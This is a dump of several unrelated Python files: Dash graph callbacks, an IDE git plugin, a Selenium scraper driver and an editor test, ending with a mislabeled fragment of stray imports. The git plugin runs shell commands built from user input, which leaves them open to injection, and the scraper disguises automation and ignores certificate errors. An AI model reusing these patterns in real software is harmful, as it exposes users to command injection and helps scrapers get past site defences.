# File: ujt/callbacks/graph_callbacks.py
import datetime as dt
from typing import Any, Dict, List, Tuple
import dash
import google.protobuf.json_format as json_format
from dash.dependencies import ALL, Input, Output, State
from dash.exceptions import PreventUpdate
from graph_structures_pb2 import SLI
from .. import (
compute_status,
constants,
converters,
id_constants,
state,
transformers,
utils,
)
from ..dash_app import app
@app.callback(
Output(id_constants.CYTOSCAPE_GRAPH, "elements"),
[
Input(id_constants.SIGNAL_SLI_REFRESH, "children"),
Input({id_constants.USER_JOURNEY_DATATABLE: ALL}, "selected_row_ids"),
Input(id_constants.SIGNAL_VIRTUAL_NODE_UPDATE, "children"),
Input({id_constants.OVERRIDE_DROPDOWN: ALL}, "value"),
Input(id_constants.SIGNAL_COMPOSITE_TAGGING_UPDATE, "children"),
Input(id_constants.CHANGE_OVER_TIME_SLI_STORE, "data"),
],
[
State(id_constants.CYTOSCAPE_GRAPH, "elements"),
State(id_constants.CYTOSCAPE_GRAPH, "selectedNodeData"),
State(id_constants.CYTOSCAPE_GRAPH, "tapNode"),
State(id_constants.VIEW_STORE, "data"),
],
)
def update_graph_elements(
# Input
sli_refresh_signal: str,
    user_journey_table_selected_row_ids: List[List[str]],
    virtual_node_update_signal: str,
    override_dropdown_value: List[int],
composite_tagging_update_signal: str,
change_over_time_data: Dict[str, Any],
# State
state_elements: List[Dict[str, Any]],
selected_node_data: List[Dict[str, Any]],
tap_node: Dict[str, Any],
view_list: List[Tuple[str, str]],
):
"""Update the elements of the cytoscape graph.
This function is called:
on startup to generate the graph
when the refresh button is clicked to regenerate the graph
        when a row is selected in the User Journey Datatable, to highlight the User Journey edges along the path
when a virtual node is updated (via the SIGNAL_VIRTUAL_NODE_UPDATE)
when a tag, style, or view is updated.
We need this callback to handle these (generally unrelated) situations because Dash only supports assigning
a single callback to a given output element.
Args:
sli_refresh_signal: Signal indicating SLIs should be refreshed.
Value holds the trigger source id (REFRESH_SLI_BUTTON or REFRESH_SLI_INTERVAL)
        user_journey_table_selected_row_ids: List of selected-row-id lists, one per matched
            user journey datatable. The outer list should contain only one element.
            Used for highlighting a path through the graph.
virtual_node_update_signal: String used as a signal to indicate that the virtual node addition/deletion was valid.
override_dropdown_value: Status enum value of the status to override for the node.
change_over_time_data: Either an empty dictionary, or a dictionary with keys
"start_timestamp" mapped to a float POSIX timestamp,
"end_timestamp" mapped to a float POSIX timestamp, and
"dict_slis" mapped to a list of SLIs represented as dictionaries.
The SLIs as dictionaries need to be parsed by the json_format module.
Used to apply styles for the Change Over Time feature.
state_elements: The list of current cytoscape graph elements.
selected_node_data: The list of data dictionaries for selected nodes.
Used to create virtual nodes.
tap_node: The cytoscape element of the latest tapped node.
Used to check which node to override the status of.
view_list: The current list of views (specific to each browser).
Returns:
        A list of cytoscape elements describing the nodes and edges of the graph.
"""
ctx = dash.callback_context
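    # dash.callback_context.triggered is a list of {"prop_id": "<id>.<prop>", "value": ...}
    # entries; ctx_triggered_info presumably unpacks the first entry into the component id,
    # property name, and new value. For pattern-matching inputs, the id part is a JSON string.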
triggered_id, triggered_prop, triggered_value = utils.ctx_triggered_info(ctx)
# print("updating elements:", ctx.triggered) # DEBUG_REMOVE
if (
triggered_id == id_constants.SIGNAL_VIRTUAL_NODE_UPDATE
and triggered_value != constants.OK_SIGNAL
) or (
triggered_id
== f"""{{"{id_constants.OVERRIDE_DROPDOWN}":"{id_constants.OVERRIDE_DROPDOWN_HIDDEN}"}}"""
):
        # No-op if:
        #   the validation signal isn't OK, or
        #   the callback fired from the dummy override dropdown.
raise PreventUpdate
node_name_message_map, client_name_message_map = state.get_message_maps()
virtual_node_map = state.get_virtual_node_map()
elements = state.get_cytoscape_elements()
# This condition determines if we need to recompute node statuses.
if triggered_id in [
None, # initial call
id_constants.SIGNAL_SLI_REFRESH,
id_constants.SIGNAL_VIRTUAL_NODE_UPDATE,
f"""{{"{id_constants.OVERRIDE_DROPDOWN}":"{id_constants.OVERRIDE_DROPDOWN}"}}""", # Dash provides the value as a stringified dict
]:
if triggered_id == id_constants.SIGNAL_SLI_REFRESH:
if sli_refresh_signal == id_constants.REFRESH_SLI_BUTTON:
state.clear_sli_cache()
sli_list = state.get_slis()
node_name_message_map = transformers.apply_slis_to_node_map(
sli_list, node_name_message_map
)
if (
triggered_id
== f"""{{"{id_constants.OVERRIDE_DROPDOWN}":"{id_constants.OVERRIDE_DROPDOWN}"}}"""
):
node_name = tap_node["data"]["ujt_id"]
state.set_node_override_status(
node_name,
triggered_value, # type: ignore
node_name_message_map=node_name_message_map,
virtual_node_map=virtual_node_map,
)
# Perform status computation.
# We can refactor this block later as well, but no other function should call it...
compute_status.reset_node_statuses(node_name_message_map)
compute_status.reset_client_statuses(client_name_message_map)
compute_status.reset_node_statuses(virtual_node_map)
# combine the two maps of nodes into one dictionary
# use duck typing -- is this pythonic or a hack?
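    # (Assumption: the Node and VirtualNode protobuf messages expose the same status fields,
    # which is what lets compute_statuses treat values from either map uniformly.)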
all_nodes_map = {**node_name_message_map, **virtual_node_map} # type: ignore
compute_status.compute_statuses(
all_nodes_map,
client_name_message_map,
)
state.set_node_name_message_map(node_name_message_map)
state.set_client_name_message_map(client_name_message_map)
state.set_virtual_node_map(virtual_node_map)
# For simplicity, we always perform all graph (view) transformations.
    # This greatly simplifies the implementation of each individual transformation, since each step doesn't
    # need to account for changes introduced by the other steps.
# However, this isn't the most efficient approach.
elements = transformers.apply_virtual_nodes_to_elements(elements)
# user_journey_table_selected_row_ids == [] when the user journey datatable isn't created yet
# it equals [None] when the datatable is created but no row is selected
if user_journey_table_selected_row_ids not in [[], [None]]:
active_user_journey_name = user_journey_table_selected_row_ids[0][0]
elements = transformers.apply_highlighted_edge_class_to_elements(
elements, active_user_journey_name
)
if change_over_time_data == {}:
        # The following calls apply classes to the elements, which are then matched to styles.
elements = transformers.apply_node_property_classes(
elements,
node_name_message_map,
client_name_message_map,
virtual_node_map,
)
tag_map = state.get_tag_map()
elements = transformers.apply_view_classes(
elements,
tag_map,
view_list,
)
else:
start_time = dt.datetime.fromtimestamp(change_over_time_data["start_timestamp"])
end_time = dt.datetime.fromtimestamp(change_over_time_data["end_timestamp"])
dict_slis = change_over_time_data["dict_slis"]
slis = [json_format.ParseDict(dict_sli, SLI()) for dict_sli in dict_slis]
elements = transformers.apply_change_over_time_classes(
elements,
slis,
start_time,
end_time,
)
# print(elements) # DEBUG_REMOVE
    # Determine if we need to generate a new UUID. This minimizes the choppiness of the animation.
if triggered_id in [None, id_constants.SIGNAL_VIRTUAL_NODE_UPDATE]:
uuid = None
else:
uuid = utils.get_existing_uuid(state_elements)
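    # Reusing a UUID already present in the rendered elements presumably lets Cytoscape match
    # old and new elements and animate between them; passing None forces fresh ids and a redraw.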
# Workaround for https://github.com/plotly/dash-cytoscape/issues/106
# Give new ids to Cytoscape to avoid immutability of edges and parent relationships.
elements = transformers.apply_uuid_to_elements(elements, uuid_to_apply=uuid)
elements = transformers.sort_nodes_by_parent_relationship(elements)
return elements
@app.callback(
Output(id_constants.CYTOSCAPE_GRAPH, "stylesheet"),
Input(id_constants.SIGNAL_STYLE_UPDATE, "children"),
)
def update_cytoscape_stylesheet(style_update_signal):
"""Updates the cytoscape stylesheet.
This function is called:
when a style is updated.
Args:
style_update_signal: Signal indicating a style was updated.
Returns:
A dictionary encoding a cytoscape format stylesheet.
"""
style_map = state.get_style_map()
stylesheet = [
*constants.BASE_CYTO_STYLESHEET,
*converters.cytoscape_stylesheet_from_style_map(style_map),
]
    return stylesheet
# File: plugins/GitTool/gittool/__init__.py
from noval import _,GetApp,NewId
import os
import noval.iface as iface
import noval.plugin as plugin
import noval.util.utils as utils
import noval.constants as constants
from noval.project.templatemanager import ProjectTemplateManager
import gittool.gitui as gitui
import noval.consts as consts
import noval.menu as tkmenu
import subprocess
import noval.util.strutils as strutils
from tkinter import messagebox
import noval.ui_base as ui_base
import noval.ttkwidgets.checklistbox as checklistbox
import noval.ttkwidgets.treeviewframe as treeviewframe
import tkinter as tk
import noval.editor.text as texteditor
import noval.ttkwidgets.textframe as textframe
from tkinter import ttk,messagebox
import copy
class RepositoryAddrDialog(ui_base.CommonModaldialog):
def __init__(self,master,face_ui):
ui_base.CommonModaldialog.__init__(self,master)
self.title(_('Set repository remote addr'))
self.ui = face_ui
row = ttk.Frame(self.main_frame)
row.columnconfigure(1,weight=1)
ttk.Label(row,text=_('Repository addr:')).grid(column=0, row=0, sticky="nsew",padx=(0,consts.DEFAUT_CONTRL_PAD_X),pady=(consts.DEFAUT_CONTRL_PAD_Y,0))
self.addr_var = tk.StringVar(value=self.GetRepositoryAddr())
name_entry = ttk.Entry(row,textvariable=self.addr_var)
name_entry.grid(column=1, row=0, sticky="nsew",pady=(consts.DEFAUT_CONTRL_PAD_Y,0))
row.pack(fill="x",expand=1)
self.AddokcancelButton()
def GetRepositoryAddr(self):
output = utils.GetCommandOutput("git remote -v",cwd=self.ui.GetProjectDocument().GetPath())
addr = ''
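        # `git remote -v` typically prints lines such as:
        #   origin  https://example.com/repo.git (fetch)
        #   origin  https://example.com/repo.git (push)
        # so stripping the 'origin' and '(push)' tokens leaves the bare URL.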
for line in output.splitlines():
if line.find('(push)') != -1:
addr = line.replace('(push)',"").replace('origin',"").strip()
return addr
def _ok(self,event=None):
if self.addr_var.get().strip() == "":
            messagebox.showinfo(GetApp().GetAppName(),_('Please set repository addr'))
return
command = "git remote add origin %s"%(self.addr_var.get())
self.ui.CallGitProcess(command)
ui_base.CommonModaldialog._ok(self,event)
class GitConfigurationDialog(ui_base.CommonModaldialog):
def __init__(self,master,face_ui):
ui_base.CommonModaldialog.__init__(self,master)
self.ui = face_ui
self.title(_('Git Global Configuration'))
sizer_frame = ttk.Frame(self.main_frame)
sizer_frame.pack(fill="both",expand=1)
sizer_frame.columnconfigure(1,weight=1)
configs = {}
self.GetConfigs(configs)
ttk.Label(sizer_frame,text=_('User name:')).grid(column=0, row=0, sticky="nsew",pady=(consts.DEFAUT_CONTRL_PAD_Y,0),padx=(consts.DEFAUT_CONTRL_PAD_X,0))
self.user_name_var = tk.StringVar(value=configs['user_name'])
user_name_entry = ttk.Entry(sizer_frame,textvariable=self.user_name_var)
user_name_entry.grid(column=1, row=0, sticky="nsew",pady=(consts.DEFAUT_CONTRL_PAD_Y,0),padx=consts.DEFAUT_CONTRL_PAD_X)
ttk.Label(sizer_frame,text=_('User email:')).grid(column=0, row=1, sticky="nsew",pady=(consts.DEFAUT_CONTRL_PAD_Y,0),padx=(consts.DEFAUT_CONTRL_PAD_X,0))
self.user_email_var = tk.StringVar(value=configs['user_email'])
user_email_entry = ttk.Entry(sizer_frame,textvariable=self.user_email_var)
user_email_entry.grid(column=1, row=1, sticky="nsew",pady=(consts.DEFAUT_CONTRL_PAD_Y,0),padx=consts.DEFAUT_CONTRL_PAD_X)
self.AddokcancelButton()
self.quote_path_var = tk.BooleanVar(value=configs.get('quotepath',True))
ttk.Checkbutton(sizer_frame,text=("Use Quote Path"),variable=self.quote_path_var).grid(column=0, row=2, sticky="nsew",padx=(consts.DEFAUT_CONTRL_PAD_X,0),pady=(consts.DEFAUT_CONTRL_PAD_Y,0))
self.golbal_chk_var = tk.BooleanVar(value=True)
ttk.Checkbutton(sizer_frame,text=("Apply to global domain"),variable=self.golbal_chk_var).grid(column=0, row=3, sticky="nsew",padx=(consts.DEFAUT_CONTRL_PAD_X,0))
def _ok(self,event=None):
if self.user_name_var.get().strip() == "":
            messagebox.showinfo(GetApp().GetAppName(),_('Please set git user name'))
            return
        if self.user_email_var.get().strip() == "":
            messagebox.showinfo(GetApp().GetAppName(),_('Please set git user email'))
return
command = "git config "
if self.golbal_chk_var.get():
command += "--global "
command += "user.name \"%s\""%self.user_name_var.get()
self.ui.CallGitProcess(command)
command = "git config "
if self.golbal_chk_var.get():
command += "--global "
command += "user.email \"%s\""%self.user_email_var.get()
self.ui.CallGitProcess(command)
if self.quote_path_var.get():
quote_path = "true"
else:
quote_path = "false"
self.ui.CallGitProcess('git config --global core.quotepath %s'%quote_path)
ui_base.CommonModaldialog._ok(self,event)
    def GetConfigs(self,configs=None):
        # Avoid a shared mutable default argument.
        if configs is None:
            configs = {}
        output = utils.GetCommandOutput("git config -l")
for line in output.splitlines():
if line.find('user.name') != -1:
user_name = line.replace('user.name=',"").strip()
configs['user_name'] = user_name
elif line.find('user.email') != -1:
user_email = line.replace('user.email=',"").strip()
configs['user_email'] = user_email
elif line.find('core.quotepath') != -1:
quotepath = line.replace('core.quotepath=',"").strip()
configs['quotepath'] = True if quotepath=="true" else False
class CommitDialog(ui_base.CommonModaldialog):
def __init__(self,master,branch,content,single_file=False,commit=True):
ui_base.CommonModaldialog.__init__(self,master,width=1000)
        if commit:
            self.title(_('Commit-[%s]') % branch)
        else:
            self.title(_('Checkout-[%s]') % branch)
commit_file_label = ttk.Label(self.main_frame)
commit_file_label.pack(fill="x")
check_listbox_view = treeviewframe.TreeViewFrame(self.main_frame,treeview_class=checklistbox.CheckListbox,borderwidth=1,relief="solid",height=10)
self.listbox = check_listbox_view.tree
check_listbox_view.pack(fill="x",expand=1)
sizer_frame = ttk.Frame(self.main_frame)
sizer_frame.pack(fill="x",expand=1)
select_all_btn = ttk.Button(
sizer_frame, text=_("Select All"), command=self.SelectAll
)
select_all_btn.grid(column=0, row=0, sticky="nsew",padx=(consts.DEFAUT_CONTRL_PAD_X,0),pady=(consts.DEFAUT_CONTRL_PAD_Y, 0))
unselect_all_btn = ttk.Button(
sizer_frame, text=_("UnSelect All"), command=self.UnselectAll
)
unselect_all_btn.grid(column=1, row=0, sticky="nsew",padx=(consts.DEFAUT_CONTRL_PAD_X,0),pady=(consts.DEFAUT_CONTRL_PAD_Y, 0))
modify_flag = 'modified:'
delete_flag = 'deleted:'
unstaged_file = False
self.is_commit = commit
commit_file_count = 0
unstaged_file_count = 0
encoding = utils.get_default_encoding()
if not single_file:
for line in content.splitlines():
                try:
                    # git output may arrive in the platform encoding; re-decode as UTF-8 when possible.
                    line = line.encode(encoding,'ignore').decode('utf-8')
                except Exception:
                    # Fall back to the original line if re-encoding fails.
                    pass
if line.find(modify_flag) != -1:
i = self.listbox.Append(line.replace(modify_flag,"").strip())
self.listbox.Check(i)
commit_file_count += 1
elif line.find(delete_flag) != -1:
i = self.listbox.Append(line.replace(delete_flag,"").strip())
self.listbox.Check(i)
commit_file_count += 1
elif line.find('Untracked files:') != -1:
unstaged_file = True
                elif (unstaged_file and commit
                        and line.find('git add <file>...') == -1
                        and line.find('no changes added to commit') == -1
                        and line.find('nothing added to commit') == -1):
if line.strip():
self.listbox.Append(line.strip())
unstaged_file_count += 1
else:
i = self.listbox.Append(content)
self.listbox.Check(i)
commit_file_count += 1
if self.is_commit:
            commit_file_label.configure(text=_('Commit files %d, Unstaged files %d')%(commit_file_count,unstaged_file_count))
ttk.Label(self.main_frame,text=_('Commit message')).pack(fill="x")
text_frame = textframe.TextFrame(self.main_frame,borderwidth=1,relief="solid",text_class=texteditor.TextCtrl,height=12)
text_frame.pack(fill="x",expand=1)
self.text = text_frame.text
ttk.Button(self.main_frame, text=_("Commit and Push"), command=self.CommitAndPush).pack(side=tk.LEFT)
self.AddokcancelButton(side=tk.LEFT)
self.ok_button.configure(text=_('Commit'),default="active")
else:
commit_file_label.configure(text=_('Commit files %d')%(commit_file_count))
self.AddokcancelButton()
self.ok_button.configure(text=_('Checkout'),default="active")
self.files = []
self.msg = ''
self.push = False
def SelectAll(self):
self.CheckListbox(True)
def CheckListbox(self,check=True):
for i in range(self.listbox.GetCount()):
self.listbox.Check(i,check)
def UnselectAll(self):
self.CheckListbox(False)
def CommitAndPush(self):
self.push = True
self._ok()
def GetFiles(self):
files = []
for i in range(self.listbox.GetCount()):
if self.listbox.IsChecked(i):
files.append(self.listbox.GetString(i))
return files
def _ok(self,event=None):
self.files = self.GetFiles()
if 0 == len(self.files):
            messagebox.showinfo(GetApp().GetAppName(),_('Please select at least one file'))
return
if self.is_commit:
self.msg = self.text.GetValue()
if self.msg.strip() == '':
                messagebox.showinfo(GetApp().GetAppName(),_('Commit message cannot be empty'))
return
ui_base.CommonModaldialog._ok(self,event)
class GitToolPlugin(plugin.Plugin):
"""plugin description here..."""
plugin.Implements(iface.MainWindowI)
MAX_COMMAND_LINE_LENGTH = 10000
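    # Windows limits a CreateProcess command line to 32767 characters (cmd.exe to about 8191),
    # so batched commands such as "git add <many files>" are rejected past this conservative cap.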
def PlugIt(self, parent):
"""Hook the calculator into the menu and bind the event"""
utils.get_logger().info("Installing GitTool plugin")
ProjectTemplateManager().AddProjectTemplate("General",_("New Project From Git Server"),[(gitui.GitProjectNameLocationPage,{'project_dir_checked':False,'enable_create_project_dir':False}),gitui.LocationSelectionPage,gitui.RepositorySourcePage,\
gitui.BranchSelectionPage,gitui.LocalDestinationPage,gitui.ImportGitfilesPage])
GetApp().bind(constants.PROJECTVIEW_POPUP_FILE_MENU_EVT, self.AppenFileMenu,True)
GetApp().bind(constants.PROJECTVIEW_POPUP_ROOT_MENU_EVT, self.AppenRootMenu,True)
self.project_browser = GetApp().MainFrame.GetView(consts.PROJECT_VIEW_NAME)
GetApp().AddMessageCatalog('gittool', __name__)
self.current_branch = None
def GetMinVersion(self):
"""Override in subclasses to return the minimum version of novalide that
the plugin is compatible with. By default it will return the current
version of novalide.
@return: version str
"""
return "1.2.2"
def InstallHook(self):
"""Override in subclasses to allow the plugin to be loaded
dynamically.
@return: None
"""
pass
def UninstallHook(self):
pass
def EnableHook(self):
pass
def DisableHook(self):
pass
def GetFree(self):
return True
def GetPrice(self):
pass
def MatchPlatform(self):
'''
        This plugin needs to distinguish between Windows and Linux builds:
        the Windows package must bundle adkpass.exe, and the Linux package
        must bundle the executable script adkpass.py.
'''
return True
def AppenRootMenu(self, event):
self.current_branch = self.GetBranch()
        utils.get_logger().debug('current branch is %s',self.current_branch)
menu = event.get('menu')
submenu = tkmenu.PopupMenu()
menu.AppendMenu(NewId(),_("Version Control"),submenu)
if self.current_branch is None:
submenu.Append(NewId(),_("Init"),handler=self.Init)
else:
submenu.Append(NewId(),_("Checkout files"),handler=self.CheckoutCommitFiles)
submenu.Append(NewId(),_("Ignore files"),handler=self.AddIgnoreFiles)
submenu.Append(NewId(),_("Pull"),handler=self.Pull)
submenu.Append(NewId(),_("Commit"),handler=self.Commit)
submenu.Append(NewId(),_("Push"),handler=self.Push)
branch_menu = tkmenu.PopupMenu()
submenu.AppendMenu(NewId(),_("Branch"),branch_menu)
branch_menu.Append(NewId(),_("Checkout branch"),handler=self.CheckoutBranch)
branch_menu.Append(NewId(),_("New branch"),handler=self.NewBranch)
branch_menu.Append(NewId(),_("Delete branch"),handler=self.NewBranch)
remote_menu = tkmenu.PopupMenu()
submenu.AppendMenu(NewId(),_("Remote"),remote_menu)
remote_menu.Append(NewId(),_("Set Remote Url"),handler=self.SetRemoteUrl)
submenu.Append(NewId(),_("Configuration"),handler=self.Configuration)
def SetRemoteUrl(self):
RepositoryAddrDialog(GetApp().MainFrame,self).ShowModal()
def Configuration(self):
GitConfigurationDialog(GetApp().MainFrame,self).ShowModal()
def Init(self):
command = "git init"
error,output,returncode = self.CallGitProcess(command)
def CheckoutBranch(self):
pass
    def GetCommandOutput(self,command):
        output = utils.GetCommandOutput(command,cwd=self.GetProjectDocument().GetPath())
        if output == '':
            output = utils.GetCommandOutput(command,cwd=self.GetProjectDocument().GetPath(),encoding='utf-8')
return output
def CheckoutCommitFiles(self):
output = self.GetCommandOutput('git status')
dlg = CommitDialog(GetApp().MainFrame,self.current_branch,output,commit=False)
if dlg.ShowModal() == constants.ID_CANCEL:
return
self.Checkoutfiles(dlg.files)
def AddIgnoreFiles(self):
pass
def NewBranch(self):
pass
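    def DeleteBranch(self):
        # Stub added so the "Delete branch" menu item has its own handler instead of
        # reusing NewBranch; the actual branch-deletion logic is not implemented yet.
        pass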
def Pull(self):
command = "git pull"
error,output,returncode = self.CallGitProcess(command)
if returncode == 0:
messagebox.showinfo(GetApp().GetAppName(),_('pull success'))
else:
messagebox.showinfo(_('Error'),_('pull fail:%s')%(error))
def Push(self):
error,output,returncode = self.CallGitProcess("git push origin %s"%self.current_branch,ask_pass=True)
if returncode != 0:
messagebox.showerror(_('Push fail'),error)
return
messagebox.showinfo(GetApp().GetAppName(),_('Push success'))
def Commit(self):
output = self.GetCommandOutput('git status')
dlg = CommitDialog(GetApp().MainFrame,self.current_branch,output)
if dlg.ShowModal() == constants.ID_CANCEL:
return
files = dlg.files
        command = 'git add'
        for commit_file in files:
            command += ' ' + strutils.emphasis_path(commit_file)
error,output,returncode = self.CallGitProcess(command)
if returncode != 0:
messagebox.showerror(_('Commit fail'),error)
return
        command = 'git commit -m "%s"'%dlg.msg
error,output,returncode = self.CallGitProcess(command)
if returncode != 0:
messagebox.showerror(_('Commit fail'),error)
return
if dlg.push:
self.Push()
else:
messagebox.showinfo(GetApp().GetAppName(),_('Commit success'))
def AppenFileMenu(self, event):
self.current_branch = self.GetBranch()
menu = event.get('menu')
tree_item = event.get('item')
project_browser = self.GetProjectFrame()
filePath = project_browser.GetView()._GetItemFilePath(tree_item)
submenu = tkmenu.PopupMenu()
menu.AppendMenu(NewId(),_("Version Control"),submenu)
submenu.Append(NewId(),_("Commit"),handler=lambda:self.Commitfile(filePath))
submenu.Append(NewId(),_("Checkout"),handler=lambda:self.Checkoutfile(filePath))
submenu.Append(NewId(),_("Push"),handler=self.Pushfile)
submenu.Append(NewId(),_("Add to ignore"),handler=self.AddIgnoreFile)
submenu.Append(NewId(),_("Add"),handler=lambda:self.AddFile(filePath))
submenu.Append(NewId(),_("Remove"),handler=lambda:self.RemoveFile(filePath))
submenu.Append(NewId(),_("Delete"),handler=lambda:self.DeleteFile(filePath))
def Checkoutfile(self,filepath):
self.Checkoutfiles([filepath])
def Checkoutfiles(self,files):
        ret = messagebox.askquestion(GetApp().GetAppName(),_('Checking out will overwrite the current file content. Are you sure you want to check out?'))
        # askquestion returns the strings 'yes' or 'no', both of which are truthy.
        if ret != messagebox.YES:
            return
for filepath in files:
error,output,returncode = self.CallGitProcess("git checkout %s"%strutils.emphasis_path(filepath))
if returncode == 0:
messagebox.showinfo(GetApp().GetAppName(),_('checkout success'))
else:
messagebox.showinfo(_('Error'),_('checkout fail:%s')%(error))
def AddIgnoreFile(self):
pass
def AddFile(self,filePath):
error,output,returncode = self.CallGitProcess("git add %s"%strutils.emphasis_path(filePath))
if returncode == 0:
messagebox.showinfo(GetApp().GetAppName(),_('add success'))
else:
messagebox.showinfo(_('Error'),_('add fail:%s')%(error))
return returncode
def RemoveFile(self,filePath):
self.GetProjectDocument().GetFirstView().RemoveFromProject()
def DeleteFile(self,filePath):
error,output,returncode = self.CallGitProcess('git rm %s'%strutils.emphasis_path(filePath))
if returncode == 0:
messagebox.showinfo(GetApp().GetAppName(),_('delete success'))
else:
messagebox.showinfo(_('Error'),_('delete fail:%s')%(error))
return
self.RemoveFile(filePath)
def Commitfile(self,filePath):
dlg = CommitDialog(GetApp().MainFrame,self.current_branch,filePath,single_file=True)
if dlg.ShowModal() == constants.ID_CANCEL:
return
returncode = self.AddFile(filePath)
if returncode != 0:
return
        command = 'git commit -m "%s"'%dlg.msg
error,output,returncode = self.CallGitProcess(command)
if returncode != 0:
messagebox.showerror(_('Commit fail'),error)
return
else:
messagebox.showinfo(GetApp().GetAppName(),_('commit success'))
def Pushfile(self):
self.Push()
def CallGitProcess(self,command,ask_pass=False):
utils.get_logger().debug('git command is %s,length is:%d',command,len(command))
if len(command) >= self.MAX_COMMAND_LINE_LENGTH:
return "command line length exceed limit....","",-1
env = copy.copy(os.environ)
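        # GIT_ASKPASS points git at a helper program it invokes to prompt for credentials,
        # letting the IDE show a password dialog instead of git blocking on a console prompt.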
if ask_pass:
ask_pass_path = gitui.GetAskPassPath()
env.update(dict(GIT_ASKPASS=ask_pass_path))
        p = subprocess.Popen(command,shell=True,stdout=subprocess.PIPE,stderr=subprocess.PIPE,\
                        cwd=self.GetProjectDocument().GetPath(),env=env)
        # communicate() drains both pipes, avoiding a deadlock when either buffer fills up.
        stdout_data, stderr_data = p.communicate()
        error = str(stderr_data,encoding = utils.get_default_encoding())
        try:
            output = str(stdout_data,encoding = utils.get_default_encoding())
        except UnicodeDecodeError:
            output = str(stdout_data,encoding = 'utf-8')
return error,output,p.returncode
def GetBranch(self):
error,output,returncode = self.CallGitProcess("git branch")
        utils.get_logger().debug('git branch -> error=%s output=%s returncode=%s',error,output,returncode)
if error and error.lower().find('fatal: not a git repository') != -1:
return None
else:
for line in output.splitlines():
if line.find('*') != -1:
return line.lstrip('*').strip()
return ''
def GetProjectDocument(self):
project_browser = self.GetProjectFrame()
return project_browser.GetView().GetDocument()
def GetProjectFrame(self):
        return GetApp().MainFrame.GetView(consts.PROJECT_VIEW_NAME)
# File: scraping_the_world/scrapers/webdriver_manager/webdriver_manager.py
import os
import traceback
from selenium import webdriver
from selenium_stealth import stealth
from scraping_the_world.scrapers.webdriver_manager.webdriver_toolkit import WebDriverToolKit
from scraping_the_world.models.querys import add_log
from env import ENV
WEBDRIVERS_PATH = os.path.dirname(os.path.realpath(__file__))
class SingletonMeta(type):
"""
The Singleton class can be implemented in different ways in Python. Some
possible methods include: base class, decorator, metaclass. We will use the
metaclass because it is best suited for this purpose.
"""
_instances = {}
def __call__(cls, *args, **kwargs):
"""
Possible changes to the value of the `__init__` argument do not affect
the returned instance.
"""
if cls not in cls._instances:
instance = super().__call__(*args, **kwargs)
cls._instances[cls] = instance
return cls._instances[cls]
class WebdriverManager(metaclass=SingletonMeta):
def __init__(self):
self.__driver = None
def get_driver(self):
if not self.__driver:
self.__driver = self.create_driver()
wdtk = WebDriverToolKit(self.__driver)
return self.__driver, wdtk
def create_driver(self):
try:
options = self.__get_options()
if ENV['ENV'] == 'DEV':
if int(ENV['SELENIUM_REMOTE']) == 1:
self.__driver = webdriver.Remote(command_executor='http://localhost:4444/wd/hub', options=options)
else:
                    webdriver_path = os.path.join(WEBDRIVERS_PATH, 'chromedriver')
self.__driver = webdriver.Chrome(executable_path=webdriver_path, options=options)
stealth(driver=self.__driver,
languages=["en-US", "en"],
vendor="Google Inc.",
platform="Win32",
webgl_vendor="Intel Inc.",
renderer="Intel Iris OpenGL Engine",
fix_hairline=True,
)
else:
self.__driver = webdriver.Remote(command_executor='http://container_selenium:4444/wd/hub', options=options)
self.__driver.maximize_window()
return self.__driver
        except Exception:
traceback.print_exc()
add_log(log_text=f'[WebdriverManager] Traceback: {traceback.format_exc()}', log_type='ERROR')
@staticmethod
def __get_options():
options = webdriver.ChromeOptions()
options.add_argument('--ignore-ssl-errors=yes')
options.add_argument('--ignore-certificate-errors')
options.add_argument('--incognito')
options.add_argument('--no-sandbox')
options.add_argument('--disable-blink-features=AutomationControlled')
options.add_argument('--enable-automation')
options.add_argument('--disable-dev-shm-usage')
options.add_argument('--disable-extensions')
options.add_argument('--disable-gpu')
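        # The two experimental options below hide Chrome's "controlled by automated software"
        # infobar and skip loading the automation extension, complementing the selenium-stealth
        # patching applied in create_driver.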
options.add_experimental_option('useAutomationExtension', False)
options.add_experimental_option("excludeSwitches", ["enable-automation"])
# options.add_argument(
# '--user-agent=Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36')
# options.add_argument('--headless')
return options
def driver_quit(self):
try:
if self.__driver:
self.__driver.quit()
self.__driver = None
        except Exception:
traceback.print_exc()
            add_log(log_text=f'[WebdriverManager] Traceback: {traceback.format_exc()}', log_type='ERROR')
# File: AutomatedTesting/Gem/PythonTests/EditorPythonBindings/tests/Editor_DisplaySettingsBus_Work.py
import os, sys
sys.path.append(os.path.dirname(__file__))
from Editor_TestClass import BaseClass
class Editor_DisplaySettingsBus_Work(BaseClass):
# Description:
# Tests the Python API from DisplaySettingsPythonFuncs.cpp while the Editor is running
@staticmethod
def test():
        import azlmbr.bus as bus
        import azlmbr.display_settings as display_settings
        # Needed so the bare `azlmbr` name is bound for azlmbr.object.create below.
        import azlmbr.object
check_result = BaseClass.check_result
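        # DisplaySettingsBus is used as a broadcast EBus: the test reads the editor's current
        # DisplaySettingsState, writes an altered copy, verifies the round trip, and restores
        # the original state so later tests see an unchanged editor.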
# Retrieve current settings
existingState = display_settings.DisplaySettingsBus(bus.Broadcast, 'GetSettingsState')
# Alter settings
alteredState = azlmbr.object.create('DisplaySettingsState')
alteredState.no_collision = False
alteredState.no_labels = False
alteredState.simulate = True
alteredState.hide_tracks = False
alteredState.hide_links = False
alteredState.hide_helpers = False
alteredState.show_dimension_figures = True
# Set altered settings
display_settings.DisplaySettingsBus(bus.Broadcast, 'SetSettingsState', alteredState)
# Get settings again
newState = display_settings.DisplaySettingsBus(bus.Broadcast, 'GetSettingsState')
# Check if the setter worked
check_result(alteredState.no_collision == newState.no_collision, 'alteredState.no_collision')
check_result(alteredState.no_labels == newState.no_labels, 'alteredState.no_labels')
check_result(alteredState.simulate == newState.simulate, 'alteredState.simulate')
check_result(alteredState.hide_tracks == newState.hide_tracks, 'alteredState.hide_tracks')
check_result(alteredState.hide_links == newState.hide_links, 'alteredState.hide_links')
check_result(alteredState.hide_helpers == newState.hide_helpers, 'alteredState.hide_helpers')
check_result(alteredState.show_dimension_figures == newState.show_dimension_figures, 'alteredState.show_dimension_figures')
# Restore previous settings
display_settings.DisplaySettingsBus(bus.Broadcast, 'SetSettingsState', existingState)
if __name__ == "__main__":
tester = Editor_DisplaySettingsBus_Work()
    tester.test_case(tester.test, level="TestDependenciesLevel")

# Source: AutomatedTesting/Gem/PythonTests/EditorPythonBindings/tests/Editor_DisplaySettingsBus_Work.py
import os
from glob import glob
from traits.api import *
import nibabel as nib
